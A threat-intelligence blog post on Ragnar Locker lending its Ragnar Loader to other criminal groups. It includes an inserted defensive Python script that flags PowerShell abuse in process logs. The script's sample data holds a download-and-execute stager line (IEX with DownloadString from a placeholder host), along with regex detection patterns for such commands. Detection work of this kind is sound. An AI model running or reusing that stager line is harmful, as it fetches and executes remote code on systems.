
March 7, 2025 |

Ragnar Locker loans loader to other criminal groups


Researchers have recently revealed that Ragnar Loader, a tool mainly associated with Ragnar Locker, is now being used by other sophisticated threat actors, including FIN7, FIN8, and Ruthless Mantis.

Ragnar Loader is a tool, first discovered in 2021, that is primarily used to establish long-term stealthy access to targeted networks using features such as encryption, process injection, token manipulation, PowerShell-based payload execution, and anti-analysis techniques.


The tool can conduct various backdoor operations by running DLL plugins and shellcode, as well as reading and exfiltrating files. It can leverage a PowerShell-based pivoting file to enable lateral movement within a network and can even serve as a command and control (C2) panel that allows the threat actor to remotely control the compromised target.
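The PowerShell-based payload execution and PowerShell pivoting described above leave traces in process-creation logs that defenders can score. The following is an added example, not part of the original post and not Field Effect's or the cited researchers' detection logic: it scans constructed log lines for generic, publicly documented PowerShell abuse patterns (encoded commands, hidden windows, execution-policy bypass, in-memory download-and-execute, remote invocation) and decodes any -EncodedCommand payload so the inner command is scored as well. The indicator weights, the alert threshold, the log format and all sample lines are assumptions made for illustration, not signatures specific to Ragnar Loader.

```python
"""
Heuristic scan of process-creation log lines for PowerShell execution patterns.

Added example, not part of the original post and not Field Effect's or the cited
researchers' detection logic. Indicators are generic PowerShell abuse patterns,
not Ragnar Loader signatures; weights, threshold and log lines are constructed.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field

# (indicator name, pattern, weight); weights are assumptions for illustration.
INDICATORS = [
    ("encoded_command", re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})"), 3),
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 1),
    ("no_profile", re.compile(r"(?i)-no(?:p|profile)\b"), 1),
    ("bypass_execution_policy", re.compile(r"(?i)-e(?:p|x|xec|xecutionpolicy)\s+bypass"), 2),
    ("download_and_execute", re.compile(
        r"(?i)(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b).*(?:\biex\b|invoke-expression)"
        r"|(?:\biex\b|invoke-expression).*(?:downloadstring|invoke-webrequest|\biwr\b)"), 3),
    ("remote_invocation", re.compile(r"(?i)\b(?:invoke-command|enter-pssession|new-pssession)\b"), 2),
]
THRESHOLD = 3  # assumed alerting threshold on the weighted score


@dataclass
class Finding:
    host: str
    user: str
    command_line: str
    indicators: list[str] = field(default_factory=list)
    score: int = 0
    decoded: str | None = None


def decode_encoded_command(b64: str) -> str | None:
    """-EncodedCommand carries base64 of UTF-16LE text; return it, or None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def match_indicators(text: str) -> tuple[list[str], int, str | None]:
    """Return (matched indicator names, weighted score, decoded payload if any)."""
    names, score, decoded = [], 0, None
    for name, pattern, weight in INDICATORS:
        m = pattern.search(text)
        if not m:
            continue
        names.append(name)
        score += weight
        if name == "encoded_command":
            decoded = decode_encoded_command(m.group(1))
    return names, score, decoded


def analyze_line(line: str) -> Finding | None:
    """Parse a constructed 'ts|host|user|image|cmdline' record; None if clean or malformed."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    _ts, host, user, _image, cmdline = parts
    names, score, decoded = match_indicators(cmdline)
    if decoded:
        # The real payload lives in the decoded text, so score that as well.
        inner, inner_score, _ = match_indicators(decoded)
        names += [f"decoded:{n}" for n in inner]
        score += inner_score
    if not names:
        return None
    return Finding(host, user, cmdline, names, score, decoded)


def scan(lines: list[str]) -> list[Finding]:
    """Every line with at least one indicator, for triage."""
    return [f for f in (analyze_line(l) for l in lines) if f is not None]


def alerts(lines: list[str]) -> list[Finding]:
    """Only findings at or above the assumed threshold."""
    return [f for f in scan(lines) if f.score >= THRESHOLD]


# Constructed sample data: a benign stager-style command encoded the way
# -EncodedCommand expects, plus four ordinary lines. example.invalid is reserved.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
_ENC = base64.b64encode(_STAGER.encode("utf-16-le")).decode()
LOG_LINES = [
    "2025-03-07T10:01:02Z|WS01|alice|C:\\Windows\\System32\\notepad.exe|notepad.exe report.txt",
    "2025-03-07T10:02:15Z|WS01|alice|powershell.exe|powershell.exe -NoProfile -Command Get-ChildItem C:\\Temp",
    f"2025-03-07T10:03:40Z|SRV02|svc_backup|powershell.exe|powershell.exe -nop -w hidden -ep bypass -enc {_ENC}",
    "2025-03-07T10:04:05Z|WS03|bob|powershell.exe|powershell.exe -NoP -NonI -c \"" + _STAGER + "\"",
    "2025-03-07T10:05:30Z|SRV02|svc_backup|powershell.exe|powershell.exe Invoke-Command -ComputerName FS01 -ScriptBlock { Get-Service }",
]

if __name__ == "__main__":
    for f in alerts(LOG_LINES):
        print(f"{f.host}/{f.user} score={f.score} indicators={f.indicators}")
```

Run as a script it prints the two records that clear the threshold (the encoded hidden-window launch on SRV02 and the inline download-and-execute on WS03); the lone Invoke-Command line is recorded by scan() but stays below the threshold, since remote invocation on its own is routine administration and should be correlated with the other indicators rather than alerted on by itself.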

While it’s unclear why Ragnar Locker appears to be renting or loaning out its tool to other criminal hacking groups, researchers have observed frequent updates to the tool that add new features and modules, making it more capable and more difficult to detect.

Source: The Hacker News

Analysis

Beyond generating revenue, Ragnar Locker may loan or rent out its malware toolkit to help obfuscate attribution, making it harder for security researchers to link specific attacks to the group. If multiple actors use the same tool, it creates plausible deniability, complicating efforts to track down the original developers.

By renting out the Ragnar Loader, Ragnar Locker can strengthen alliances with other cybercriminal syndicates, such as FIN7 and FIN8, fostering collaboration where different groups contribute expertise—one specializing in network breaches, another in ransomware deployment. This increases the effectiveness of attacks while allowing Ragnar Locker to study how affiliates operate, gather intelligence on new attack methods, and refine its own tactics.

Additionally, the revenue generated from these rentals can be reinvested into research and development, ensuring the malware remains sophisticated and resilient against evolving security defenses.

Ultimately, renting out Ragnar Loader allows Ragnar Locker to scale its operations, diversify its income, and reduce risk while maintaining influence within the broader cybercrime ecosystem. This strategy enables the group to maximize impact while staying in the shadows, making detection and disruption more challenging for cybersecurity professionals and law enforcement agencies.

Mitigation

Field Effect’s Security Intelligence team constantly monitors the cyber threat landscape for threats related to loaders and other potentially malicious tools. This research contributes to the timely deployment of signatures into Field Effect MDR to detect and mitigate these threats.

Field Effect MDR users are automatically notified when threat-related activity is detected in their environment and are encouraged to review these AROs as quickly as possible via the Field Effect portal.
